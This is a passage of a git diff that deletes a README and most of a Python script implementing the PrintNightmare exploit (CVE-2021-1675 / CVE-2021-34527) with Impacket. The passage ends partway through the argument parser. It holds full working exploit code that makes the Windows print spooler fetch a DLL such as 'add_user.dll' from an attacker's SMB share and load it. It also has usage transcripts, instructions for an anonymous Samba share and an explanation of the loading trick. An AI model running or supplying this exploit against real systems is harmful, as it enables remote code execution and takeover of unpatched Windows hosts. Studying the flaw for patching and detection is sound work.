-$ ./printnightmare.py -dll '\\172.16.19.1\smb\add_user.dll' 'user:Passw0rd@172.16.19.128'
-Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
-
-[*] Enumerating printer drivers
-[*] Driver name: 'Microsoft XPS Document Writer v5'
-[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
-[*] DLL path: '\\\\172.16.19.1\\smb\\add_user.dll'
-[*] Copying over DLL
-[*] Successfully copied over DLL
-[*] Trying to load DLL
-[*] Successfully loaded DLL
-```
-
-##### Local DLL
-```bash
-$ ./printnightmare.py -dll 'C:\Windows\System32\spool\drivers\x64\3\old\1\add_user.dll' 'user:Passw0rd@172.16.19.128'
-Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
-
-[*] Enumerating printer drivers
-[*] Driver name: 'Microsoft XPS Document Writer v5'
-[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
-[*] DLL path: 'C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\add_user.dll'
-[*] Loading DLL
-[*] Successfully loaded DLL
-```
-
-Notice that the local DLL example doesn't abuse CVE-2021-34527 to copy over the DLL.
-
-##### Custom name
-```bash
-$ ./printnightmare.py -dll '\\172.16.19.1\smb\add_user.dll' -name 'My Printer Driver' 'user:Passw0rd@172.16.19.128'
-Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
-
-[*] Enumerating printer drivers
-[*] Driver name: 'My Printer Driver'
-[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
-[*] DLL path: '\\\\172.16.19.1\\smb\\add_user.dll'
-[*] Copying over DLL
-[*] Successfully copied over DLL
-[*] Trying to load DLL
-[*] Successfully loaded DLL
-
-$ ./printnightmare.py -list 'user:Passw0rd@172.16.19.128'
-Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
-
-[*] Enumerating printer drivers
-Name:               Microsoft XPS Document Writer v4
-Environment:        Windows x64
-Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll
-Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_f340cb58fcd23202\MXDW.gpd
-Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_9bf7e0c26ba91f8b\Amd64\PrintConfig.dll
-Version:            4
-----------------------------------------------------------------
-Name:               Microsoft Print To PDF
-Environment:        Windows x64
-Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll
-Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_80184dcbef6775bc\MPDW-PDC.xml
-Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_9bf7e0c26ba91f8b\Amd64\PrintConfig.dll
-Version:            4
-----------------------------------------------------------------
-Name:               My Printer Driver
-Environment:        Windows x64
-Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL
-Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\add_user.dll
-Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\add_user.dll
-Version:            3
-----------------------------------------------------------------
-Name:               Microsoft Shared Fax Driver
-Environment:        Windows x64
-Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\FXSDRV.DLL
-Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\FXSUI.DLL
-Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\FXSUI.DLL
-Version:            3
-----------------------------------------------------------------
-Name:               Microsoft enhanced Point and Print compatibility driver
-Environment:        Windows x64
-Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv.dll
-Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\unishare.gpd
-Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll
-Version:            3
-----------------------------------------------------------------
-```
-
-#### Check if target is vulnerable
-
-##### Unpatched Windows 10
-```bash
-$ ./printnightmare.py -check 'user:Passw0rd@172.16.19.128'
-Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
-
-[*] Target appears to be vulnerable!
-```
-
-##### Patched Windows Server 2022
-```bash
-$ ./printnightmare.py -check 'user:Passw0rd@172.16.19.135'
-Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
-
-[!] Target does not appear to be vulnerable
-```
-
-#### List current printer drivers
-
-```bash
-$ ./printnightmare.py -list 'user:Passw0rd@172.16.19.135'
-Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
-
-[*] Enumerating printer drivers
-Name:               Microsoft XPS Document Writer v4
-Environment:        Windows x64
-Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_075615bee6f80a8d\Amd64\mxdwdrv.dll
-Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_8bc7809b71930efc\MXDW.gpd
-Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_c9865835eff4a608\Amd64\PrintConfig.dll
-Version:            4
-----------------------------------------------------------------
-Name:               Microsoft Print To PDF
-Environment:        Windows x64
-Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_075615bee6f80a8d\Amd64\mxdwdrv.dll
-Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_6dc3549941ff1a57\MPDW-PDC.xml
-Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_c9865835eff4a608\Amd64\PrintConfig.dll
-Version:            4
-----------------------------------------------------------------
-Name:               Microsoft enhanced Point and Print compatibility driver
-Environment:        Windows x64
-Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv.dll
-Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\unishare.gpd
-Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll
-Version:            3
-----------------------------------------------------------------
-```
-
-#### Delete printer driver
-
-May require administrative privileges.
-
-```bash
-$ ./printnightmare.py -delete -name 'Microsoft XPS Document Writer v5' 'administrator:Passw0rd@172.16.19.128'
-Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
-
-[*] Deleted printer driver!
-```
-
-## Details
-
-PrintNightmare consists of two CVE's, CVE-2021-1675 / CVE-2021-34527. 
-
-### CVE-2021-1675
-
-A non-administrative user is allowed to add a new printer driver. This vulnerability was fixed by only allowing administrators to add new printer drivers. A patched version of the print spooler will return `RPC_E_ACCESS_DENIED` (Code: `0x8001011b`) if a non-administrator tries to add a new printer driver. 
-
-### CVE-2021-34527
-
-When [adding a new printer driver](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b), the `pDataFile` parameter in the [DRIVER_CONTAINER](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/3a3f9cf7-8ec4-4921-b1f6-86cf8d139bc2) allows UNC paths. The DLL specified in `pDataFile` will however **not** be loaded, *but* it will get copied over to a local path allowing us to create a new printer driver with the `pConfigFile` parameter pointing to the local path which will load the DLL. A patched version of the printer spooler will return `ERROR_INVALID_PARAMETER` (Code: `0x57`)
-
-### Combining the pieces
-
-Only CVE-2021-1675 is needed if the malicious DLL is already located on the target.
-
-For PrintNightmare, if the DLL is not a local path, then CVE-2021-34527 can be used to fetch the DLL via UNC paths. For that reason, it is necessary to serve the DLL over SMB. If you're not familiar with SMB and UNC, read the following subsection.
-
-When creating a new printer driver, the DLL in the `pDataFile` parameter will **not** be loaded for security reasons. However, it *will* be copied over to `C:\Windows\system32\spool\drivers\x64\3\`. Then, we could create a new printer driver that uses `pConfigFile` (which will load the DLL) with the local path. However, the DLL is in use by the first printer driver when creating the second printer driver. Instead, we could overwrite the first printer driver, which will make the printer driver's DLLs get copied over to `C:\Windows\system32\spool\drivers\x64\3\old\<I>\`, where `<I>` is incremented for each DLL. Now we can create a third printer driver that will use the local path `C:\Windows\system32\spool\drivers\x64\3\old\<I>\`, since the DLL is no longer used. Now it's just a matter of guessing `<I>` which will start incrementing from `1`.
-
-Note that the DLL will keep its filename locally, so if you initially run the exploit with `foo.dll` and it gets saved to `C:\Windows\system32\spool\drivers\x64\3\old\1\foo.dll` and you then change the contents of `foo.dll` locally and run the exploit again and it now gets saved to `C:\Windows\system32\spool\drivers\x64\3\old\5\foo.dll`, then the original `foo.dll` will be used since it is located in `C:\Windows\system32\spool\drivers\x64\3\old\1\foo.dll`. Instead, simply change the filename if you change the contents of the DLL.
-
-#### SMB and UNC
-
-In short, a UNC path is a path to a file or folder on a network rather than a local file, and it contains the server name and path. For instance, the UNC path `\\10.0.0.2\files\foo.txt` is a file `foo.txt` that is served from the `files` share of the server `10.0.0.2`. Usually, a share is served over SMB, but WebDAV is also supported. To create an SMB share on Linux, the easiest and most reliable way is to use the `Samba` package.
-
-To install `Samba` with `apt`:
-```bash
-$ sudo apt install samba
-```
-
-Edit the `/etc/samba/smb.conf` and add the following at the end of the file:
-```
-[smb]
-    comment = Samba
-    path = /tmp/share
-    guest ok = yes
-    read only = yes
-    browsable = yes
-    force user = nobody
-```
-
-This will create a new share called `smb` and serve the files inside `/tmp/share`. It allows for anonymous access, and the local user `nobody` will be used to browse the files.
-
-Then start the Samba service by doing:
-```bash
-$ sudo service smbd start
-```
-
-Suppose your Linux machine has the IP `192.168.1.100` and you wish to serve the `evil.dll`, then the UNC path in this scenario will be `\\192.168.1.100\smb\evil.dll`. 
-
-## Authors
-- [@ly4k](https://github.com/ly4k)
-
-## Credits
-- [@cube0x0](https://github.com/cube0x0)'s [implementation](https://github.com/cube0x0/CVE-2021-1675)
-- [Impacket](https://github.com/SecureAuthCorp/impacket)
\ No newline at end of file
diff --git a/exploit/windows/print_nightmare/PrintNightmare/printnightmare.py b/exploit/windows/print_nightmare/PrintNightmare/printnightmare.py
deleted file mode 100755
index e91d442..0000000
--- a/exploit/windows/print_nightmare/PrintNightmare/printnightmare.py
+++ /dev/null
@@ -1,760 +0,0 @@
-#!/usr/bin/python3
-#
-# PrintNightmare (CVE-2021-1675 / CVE-2021-34527)
-#
-# Authors:
-#   @ly4k (https://github.com/ly4k)
-#
-# Credit:
-#   @cube0x0 (https://github.com/cube0x0)
-#
-# Description:
-#   PrintNightmare implementation using standard Impacket
-#
-#   PrintNightmare consists of two CVE's, CVE-2021-1675 & CVE-2021-34527.
-#
-#   CVE-2021-1675
-#   A non-administrator user is allowed to add a new printer driver.
-#   This vulnerability was fixed by only allowing administrators to
-#   add a new printer driver. A patched printer spooler will return RPC_E_ACCESS_DENIED
-#   whenever a non-administrator tries to add a new printer driver.
-#
-#   CVE-2021-34527
-#   When creating a new printer driver, the pDriverPath and pConfigFile parameters
-#   are checked for UNC paths, and is only allowed to be local paths. However,
-#   the pDataFile parameter is not constrained to local paths. Only pDriverPath and pConfigFile
-#   will be loaded for security reaons, not pDataFile. This vulnerability was fixed by not allowing
-#   UNC paths in the pDataFile parameter. A patched printer spooler will return ERROR_INVALID_PARAMETER
-#   when using a UNC path in pDataFile.
-#
-#   This exploit also works with a local path instead of an UNC path.
-
-import sys
-import logging
-import argparse
-import pathlib
-
-from impacket import system_errors, version
-from impacket.dcerpc.v5.rpcrt import DCERPCException
-from impacket.structure import Structure
-from impacket.examples import logger
-from impacket.examples.utils import parse_target
-from impacket.dcerpc.v5 import transport, rprn
-from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRSTRUCT, NDRUNION, NULL
-from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, ULONG, WSTR
-from impacket.dcerpc.v5.rprn import (
-    checkNullString,
-    STRING_HANDLE,
-    PBYTE_ARRAY,
-)
-
-
-class DCERPCSessionError(DCERPCException):
-    def __init__(self, error_string=None, error_code=None, packet=None):
-        DCERPCException.__init__(self, error_string, error_code, packet)
-
-    def __str__(self):
-        key = self.error_code
-        if key in system_errors.ERROR_MESSAGES:
-            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
-            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
-            return "RPRN SessionError: code: 0x%x - %s - %s" % (
-                self.error_code,
-                error_msg_short,
-                error_msg_verbose,
-            )
-        else:
-            return "RPRN SessionError: unknown error code: 0x%x" % self.error_code
-
-
-################################################################################
-# CONSTANTS
-################################################################################
-# MS-RPRN - 3.1.4.4.8
-APD_COPY_ALL_FILES = 0x00000004
-APD_COPY_FROM_DIRECTORY = 0x00000010
-APD_INSTALL_WARNED_DRIVER = 0x00008000
-
-# MS-RPRN - 3.1.4.4.7
-DPD_DELETE_UNUSED_FILES = 0x00000001
-
-# https://docs.microsoft.com/en-us/windows/win32/com/com-error-codes-3
-RPC_E_ACCESS_DENIED = 0x8001011B
-system_errors.ERROR_MESSAGES[RPC_E_ACCESS_DENIED] = (
-    "RPC_E_ACCESS_DENIED",
-    "Access is denied.",
-)
-
-################################################################################
-# STRUCTURES
-################################################################################
-# MS-RPRN - 2.2.1.5.1
-class DRIVER_INFO_1(NDRSTRUCT):
-    structure = (("pName", STRING_HANDLE),)
-
-
-class PDRIVER_INFO_1(NDRPOINTER):
-    referent = (("Data", DRIVER_INFO_1),)
-
-
-# MS-RPRN - 2.2.1.5.2
-class DRIVER_INFO_2(NDRSTRUCT):
-    structure = (
-        ("cVersion", DWORD),
-        ("pName", LPWSTR),
-        ("pEnvironment", LPWSTR),
-        ("pDriverPath", LPWSTR),
-        ("pDataFile", LPWSTR),
-        ("pConfigFile", LPWSTR),
-    )
-
-
-class PDRIVER_INFO_2(NDRPOINTER):
-    referent = (("Data", DRIVER_INFO_2),)
-
-
-class DRIVER_INFO_2_BLOB(Structure):
-    structure = (
-        ("cVersion", "<L"),
-        ("NameOffset", "<L"),
-        ("EnvironmentOffset", "<L"),
-        ("DriverPathOffset", "<L"),
-        ("DataFileOffset", "<L"),
-        ("ConfigFileOffset", "<L"),
-    )
-
-    def __init__(self, data=None):
-        Structure.__init__(self, data=data)
-
-    def fromString(self, data, offset=0):
-        Structure.fromString(self, data)
-
-        name = data[self["NameOffset"] + offset :].decode("utf-16-le")
-        name_len = name.find("\0")
-        self["Name"] = checkNullString(name[:name_len])
-
-        self["ConfigFile"] = data[
-            self["ConfigFileOffset"] + offset : self["DataFileOffset"] + offset
-        ].decode("utf-16-le")
-        self["DataFile"] = data[
-            self["DataFileOffset"] + offset : self["DriverPathOffset"] + offset
-        ].decode("utf-16-le")
-        self["DriverPath"] = data[
-            self["DriverPathOffset"] + offset : self["EnvironmentOffset"] + offset
-        ].decode("utf-16-le")
-        self["Environment"] = data[
-            self["EnvironmentOffset"] + offset : self["NameOffset"] + offset
-        ].decode("utf-16-le")
-
-
-class DRIVER_INFO_2_ARRAY(Structure):
-    def __init__(self, data=None, pcReturned=None):
-        Structure.__init__(self, data=data)
-        self["drivers"] = list()
-        remaining = data
-        if data is not None:
-            for _ in range(pcReturned):
-                attr = DRIVER_INFO_2_BLOB(remaining)
-                self["drivers"].append(attr)
-                remaining = remaining[len(attr) :]
-
-
-class DRIVER_INFO_UNION(NDRUNION):
-    commonHdr = (("tag", ULONG),)
-    union = {
-        1: ("pNotUsed", PDRIVER_INFO_1),
-        2: ("Level2", PDRIVER_INFO_2),
-    }
-
-
-# MS-RPRN - 3.1.4.1.8.3
-class DRIVER_CONTAINER(NDRSTRUCT):
-    structure = (
-        ("Level", DWORD),
-        ("DriverInfo", DRIVER_INFO_UNION),
-    )
-
-
-################################################################################
-# RPC CALLS
-################################################################################
-# MS-RPRN - 3.1.4.4.2
-class RpcEnumPrinterDrivers(NDRCALL):
-    opnum = 10
-    structure = (
-        ("pName", STRING_HANDLE),
-        ("pEnvironment", LPWSTR),
-        ("Level", DWORD),
-        ("pDrivers", PBYTE_ARRAY),
-        ("cbBuf", DWORD),
-    )
-
-
-class RpcEnumPrinterDriversResponse(NDRCALL):
-    structure = (
-        ("pDrivers", PBYTE_ARRAY),
-        ("pcbNeeded", DWORD),
-        ("pcReturned", DWORD),
-        ("ErrorCode", ULONG),
-    )
-
-
-# MS-RPRN - 3.1.4.4.8
-class RpcAddPrinterDriverEx(NDRCALL):
-    opnum = 89
-    structure = (
-        ("pName", STRING_HANDLE),
-        ("pDriverContainer", DRIVER_CONTAINER),
-        ("dwFileCopyFlags", DWORD),
-    )
-
-
-class RpcAddPrinterDriverExResponse(NDRCALL):
-    structure = (("ErrorCode", ULONG),)
-
-
-# MS-RPRN - 3.1.4.4.7
-class RpcDeletePrinterDriverEx(NDRCALL):
-    opnum = 84
-    structure = (
-        ("pName", STRING_HANDLE),
-        ("pEnvironment", WSTR),
-        ("pDriverName", WSTR),
-        ("dwDeleteFlag", DWORD),
-        ("dwVersionNum", DWORD),
-    )
-
-
-class RpcDeletePrinterDriverExResponse(NDRCALL):
-    structure = (("ErrorCode", ULONG),)
-
-
-################################################################################
-# OPNUMs and their corresponding structures
-################################################################################
-OPNUMS = {
-    10: (RpcEnumPrinterDrivers, RpcEnumPrinterDriversResponse),
-    84: (RpcDeletePrinterDriverEx, RpcDeletePrinterDriverExResponse),
-    89: (RpcAddPrinterDriverEx, RpcAddPrinterDriverExResponse),
-}
-
-################################################################################
-# HELPER FUNCTIONS
-################################################################################
-def hRpcEnumPrinterDrivers(dce, pName, pEnvironment, Level):
-    request = RpcEnumPrinterDrivers()
-    request["pName"] = checkNullString(pName)
-    request["pEnvironment"] = checkNullString(pEnvironment)
-    request["Level"] = Level
-    request["pDrivers"] = NULL
-    request["cbBuf"] = 0
-
-    try:
-        dce.request(request)
-    except DCERPCSessionError as e:
-        if str(e).find("ERROR_INSUFFICIENT_BUFFER") < 0:
-            raise
-        bytesNeeded = e.get_packet()["pcbNeeded"]
-
-    request = RpcEnumPrinterDrivers()
-
-    request["pName"] = checkNullString(pName)
-    request["pEnvironment"] = checkNullString(pEnvironment)
-    request["Level"] = Level
-    request["pDrivers"] = b"\0" * bytesNeeded
-    request["cbBuf"] = bytesNeeded
-
-    return dce.request(request)
-
-
-def hRpcAddPrinterDriverEx(dce, pName, pDriverContainer, dwFileCopyFlags):
-    request = RpcAddPrinterDriverEx()
-
-    request["pName"] = checkNullString(pName)
-    request["pDriverContainer"] = pDriverContainer
-    request["dwFileCopyFlags"] = dwFileCopyFlags
-
-    return dce.request(request)
-
-
-def hRpcDeletePrinterDriverEx(
-    dce, pName, pEnvironment, pDriverName, dwDeleteFlag, dwVersionNum
-):
-    request = RpcDeletePrinterDriverEx()
-
-    request["pName"] = checkNullString(pName)
-    request["pEnvironment"] = checkNullString(pEnvironment)
-    request["pDriverName"] = checkNullString(pDriverName)
-    request["dwDeleteFlag"] = dwDeleteFlag
-    request["dwVersionNum"] = dwVersionNum
-
-    return dce.request(request)
-
-
-################################################################################
-# PrintNightmare
-################################################################################
-class PrintNightmare:
-    def __init__(
-        self,
-        username="",
-        password="",
-        domain="",
-        hashes=None,
-        port=135,
-        remote_name="",
-        target_ip="",
-        do_kerberos=False,
-        dc_host="",
-    ):
-        self.username = username
-        self.password = password
-        self.domain = domain
-        self.lmhash = ""
-        self.nthash = ""
-        self.port = port
-        self.remote_name = remote_name
-        self.target_ip = target_ip
-        self.do_kerberos = do_kerberos
-        self.dc_host = dc_host
-
-        if hashes is not None:
-            hashes = hashes.split(":")
-            if len(hashes) == 1:
-                (nthash,) = hashes
-                self.lmhash = self.nthash = nthash
-            else:
-                self.lmhash, self.nthash = hashes
-
-    def connect(self):
-        # Connect and bind to MS-RPRN (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/848b8334-134a-4d02-aea4-03b673d6c515)
-        stringbinding = r"ncacn_np:%s[\PIPE\spoolss]" % self.remote_name
-
-        logging.debug("Binding to %s" % (repr(stringbinding)))
-
-        rpctransport = transport.DCERPCTransportFactory(stringbinding)
-
-        rpctransport.set_credentials(
-            self.username,
-            self.password,
-            self.domain,
-            self.lmhash,
-            self.nthash,
-        )
-
-        rpctransport.set_kerberos(self.do_kerberos, kdcHost=self.dc_host)
-
-        rpctransport.setRemoteHost(self.target_ip)
-        rpctransport.set_dport(self.port)
-
-        try:
-            dce = rpctransport.get_dce_rpc()
-
-            # Connect to spoolss named pipe
-            dce.connect()
-
-            # Bind to MSRPC MS-RPRN UUID: 12345678-1234-ABCD-EF00-0123456789AB
-            dce.bind(rprn.MSRPC_UUID_RPRN)
-        except Exception as e:
-            logging.error("Failed to bind: %s" % e)
-            sys.exit(1)
-
-        logging.debug("Bind OK")
-
-        return dce
-
-    def getDriverPath(self, dce, environment):
-        # List current drivers to find the 'FileDirectory' directory
-        # This directory has some unique parts of the full path
-        # 'UNIDRV.DLL' is a default printer driver DLL
-        drivers = self.list(environment, dce)
-
-        for driver in drivers:
-            if "filerepository" in driver["DriverPath"].lower():
-                return (
-                    str(pathlib.PureWindowsPath(driver["DriverPath"]).parent)
-                    + r"\UNIDRV.DLL"
-                )
-
-        logging.error("Failed to find printer drivers. See -list")
-        sys.exit(1)
-
-    def list(self, environment, dce=None):
-        # Use RpcEnumPrinterDrivers to get existing printer drivers
-        logging.info("Enumerating printer drivers")
-
-        if dce == None:
-            dce = self.connect()
-
-        resp = hRpcEnumPrinterDrivers(dce, NULL, environment, 2)
-        blobs = DRIVER_INFO_2_ARRAY(b"".join(resp["pDrivers"]), resp["pcReturned"])
-        drivers = blobs["drivers"]
-
-        return drivers
-
-    def delete(self, environment, name):
-        # Use RpcDeletePrinterDriverEx to delete printer driver
-        # and associated ununsed files. This will only delete the remote
-        # DLL. May require administrative privileges
-        dce = self.connect()
-
-        try:
-            hRpcDeletePrinterDriverEx(
-                dce, NULL, environment, name, DPD_DELETE_UNUSED_FILES, 0
-            )
-        except DCERPCSessionError as e:
-            logging.error("Failed to delete printer driver: %s" % e)
-            sys.exit(1)
-        except DCERPCException as e:
-            if e.error_code == system_errors.ERROR_ACCESS_DENIED:
-                logging.error(
-                    "Got access denied while trying to delete printer driver: %s" % e
-                )
-                sys.exit(1)
-            logging.error("Failed to delete printer driver: %s" % e)
-            sys.exit(1)
-
-        logging.info("Deleted printer driver!")
-
-    def check(self):
-        # Check if target is vulnerable to CVE-2021-1675 by
-        # creating an empty printer driver that will fail.
-        # Depending on the error code, it's possible to determine
-        # it has been patched.
-        dce = self.connect()
-
-        flags = APD_COPY_ALL_FILES | APD_COPY_FROM_DIRECTORY | APD_INSTALL_WARNED_DRIVER
-
-        driver_container = DRIVER_CONTAINER()
-        driver_container["Level"] = 2
-        driver_container["DriverInfo"]["tag"] = 2
-        driver_container["DriverInfo"]["Level2"]["cVersion"] = 0
-        driver_container["DriverInfo"]["Level2"]["pName"] = NULL
-        driver_container["DriverInfo"]["Level2"]["pEnvironment"] = NULL
-        driver_container["DriverInfo"]["Level2"]["pDriverPath"] = NULL
-        driver_container["DriverInfo"]["Level2"]["pDataFile"] = NULL
-        driver_container["DriverInfo"]["Level2"]["pConfigFile"] = NULL
-        driver_container["DriverInfo"]["Level2"]["pConfigFile"] = NULL
-
-        try:
-            hRpcAddPrinterDriverEx(
-                dce,
-                pName=NULL,
-                pDriverContainer=driver_container,
-                dwFileCopyFlags=flags,
-            )
-        except DCERPCSessionError as e:
-            # RPC_E_ACCESS_DENIED is returned on patched systems, when
-            # a non-administrative user tries to create a new printer
-            # driver
-            if e.error_code == RPC_E_ACCESS_DENIED:
-                return False
-            # If vulnerable, 'ERROR_INVALID_PARAMETER' will be returned
-            if e.error_code == system_errors.ERROR_INVALID_PARAMETER:
-                return True
-            raise e
-
-        return True
-
-    def exploit(
-        self, driver_name="", environment="", driver_path="", dll_path="", iterator=10
-    ):
-        # Use CVE-2021-34527 and CVE-2021-1675 to copy over and laod remote DLL
-        dce = self.connect()
-
-        if driver_path == "":
-            driver_path = self.getDriverPath(dce, environment)
-
-        logging.info("Driver name: %s" % repr(driver_name))
-        logging.info("Driver path: %s" % repr(driver_path))
-        logging.info("DLL path: %s" % repr(dll_path))
-        is_unc = False
-        if dll_path.startswith("\\\\"):
-            is_unc = True
-
-        # Create a new DRIVER_CONTAINER for RpcAddPrinterDriverEx
-        # 'DriverPath' must be a valid printer driver. 'UNIDRV.dll' is used by default.
-        # 'ConfigFile' must be valid local DLL. It will get loaded.
-        # 'DataFile' is the remote or local DLL that will loaded. It will not get loaded, only copied.
-        driver_container = DRIVER_CONTAINER()
-        driver_container["Level"] = 2
-        driver_container["DriverInfo"]["tag"] = 2
-        driver_container["DriverInfo"]["Level2"]["cVersion"] = 3
-        driver_container["DriverInfo"]["Level2"]["pName"] = checkNullString(driver_name)
-        driver_container["DriverInfo"]["Level2"]["pEnvironment"] = checkNullString(
-            environment
-        )
-        driver_container["DriverInfo"]["Level2"]["pDriverPath"] = checkNullString(
-            driver_path
-        )
-        driver_container["DriverInfo"]["Level2"]["pDataFile"] = checkNullString(
-            dll_path
-        )
-        driver_container["DriverInfo"]["Level2"]["pConfigFile"] = checkNullString(
-            "C:\\Windows\\System32\\kernelbase.dll"
-        )
-
-        # https://docs.microsoft.com/en-us/windows/win32/printdocs/addprinterdriverex
-        # APD_COPY_ALL_FILES - Add the printer driver and copy all the files in the printer-driver directory.
-        # APD_COPY_FROM_DIRECTORY - Add the printer driver using the fully qualified file names
-        # APD_INSTALL_WARNED_DRIVER - Even if the driver is unreliable, it is installed and no warning is given
-        flags = APD_COPY_ALL_FILES | APD_COPY_FROM_DIRECTORY | APD_INSTALL_WARNED_DRIVER
-
-        if is_unc:
-            logging.info("Copying over DLL")
-        else:
-            driver_container["DriverInfo"]["Level2"]["pConfigFile"] = checkNullString(
-                dll_path
-            )
-            logging.info("Loading DLL")
-
-        # Add new printer driver. This will copy the remote DLL to a C:\Windows\system32\spool\drivers\x64\3
-        try:
-            hRpcAddPrinterDriverEx(
-                dce,
-                pName=NULL,
-                pDriverContainer=driver_container,
-                dwFileCopyFlags=flags,
-            )
-        except DCERPCSessionError as e:
-            if e.error_code == system_errors.ERROR_BAD_NET_RESP:
-                logging.error(
-                    "Got bad response while adding printer driver. This can happen when using smbserver.py from Impacket. Try using Samba instead (%s)"
-                    % e
-                )
-                sys.exit(1)
-            if e.error_code == RPC_E_ACCESS_DENIED:
-                logging.error(
-                    "Failed to create printer driver. Target is most likely patched"
-                )
-                sys.exit(1)
-
-            logging.error("Failed to create printer driver: %s" % e)
-            sys.exit(1)
-
-        if is_unc:
-            logging.info("Successfully copied over DLL")
-        else:
-            logging.info("Successfully loaded DLL")
-            sys.exit(1)
-
-        logging.info("Trying to load DLL")
-
-        filename = pathlib.PureWindowsPath(dll_path).name
-
-        # Whenever the printer driver is overwritten, the previous DLL's will be saved
-        # to C:\Windows\system32\spool\drivers\x64\3\old\<I>\, where <I> is incremented
-        # for each DLL. To find the remote DLL requires a subtle bruteforcing. Usually,
-        # it will work in second iteration if run for the first time. If the exploit
-        # is run again and the same filename is used, the first DLL will get loaded, since
-        # it's not immediately removed from the 'old' directory.
-        driver_container["DriverInfo"]["Level2"]["pConfigFile"] = checkNullString(
-            "C:\\Windows\\System32\\ntdll.dll"
-        )
-        try:
-            resp = hRpcAddPrinterDriverEx(
-                dce,
-                pName=NULL,
-                pDriverContainer=driver_container,
-                dwFileCopyFlags=flags,
-            )
-        except DCERPCSessionError as e:
-            print("Got unexpected error: %s" % e)
-
-        i = 1
-        while True:
-            driver_container["DriverInfo"]["Level2"]["pConfigFile"] = checkNullString(
-                "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\%i\\%s"
-                % (i, filename)
-            )
-            try:
-                resp = hRpcAddPrinterDriverEx(
-                    dce,
-                    pName=NULL,
-                    pDriverContainer=driver_container,
-                    dwFileCopyFlags=flags,
-                )
-                if resp["ErrorCode"] == 0:
-                    logging.info(
-                        "Successfully loaded DLL from: %s"
-                        % (
-                            "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\%i\\%s"
-                            % (i, filename)
-                        )
-                    )
-                    sys.exit(1)
-            except DCERPCSessionError as e:
-                if e.error_code == system_errors.ERROR_PATH_NOT_FOUND:
-                    logging.warning("Loading DLL failed. Try again.")
-                    sys.exit(1)
-                if e.error_code != system_errors.ERROR_FILE_NOT_FOUND:
-                    logging.warning(
-                        "Got unexpected error while trying to load DLL: %s" % e
-                    )
-            i += 1
-
-
-if __name__ == "__main__":
-    print(version.BANNER)
-
-    logger.init()
-
-    parser = argparse.ArgumentParser(
-        add_help=True,
-        description="PrintNightmare (CVE-2021-1675 / CVE-2021-34527)",
-    )
-    parser.add_argument(
-        "target",
-        action="store",
-        help="[[domain/]username[:password]@]<targetName or address>",
-    )
-
-    parser.add_argument("-debug", action="store_true", help="Turn DEBUG output ON")
-
-    group = parser.add_argument_group("connection")
-
-    group.add_argument(
-        "-port",
-        choices=["139", "445"],
-        nargs="?",
-        default="445",
-        metavar="destination port",
-        help="Destination port to connect to MS-RPRN named pipe",
-    )
-    group.add_argument(
-        "-target-ip",
-        action="store",
-        metavar="ip address",
-        help="IP Address of the target machine. If "
-        "ommited it will use whatever was specified as target. This is useful when target is the NetBIOS "
-        "name and you cannot resolve it",
-    )
-
-    group = parser.add_argument_group("authentication")
-
-    group.add_argument(
-        "-hashes",
-        action="store",
-        metavar="LMHASH:NTHASH",
-        help="NTLM hashes, format is LMHASH:NTHASH",
-    )
-    parser.add_argument(
-        "-no-pass", action="store_true", help="don't ask for password (useful for -k)"
-    )
-    parser.add_argument(
-        "-k",
-        action="store_true",
-        help="Use Kerberos authentication. Grabs credentials from ccache file "
-        "(KRB5CCNAME) based on target parameters. If valid credentials "
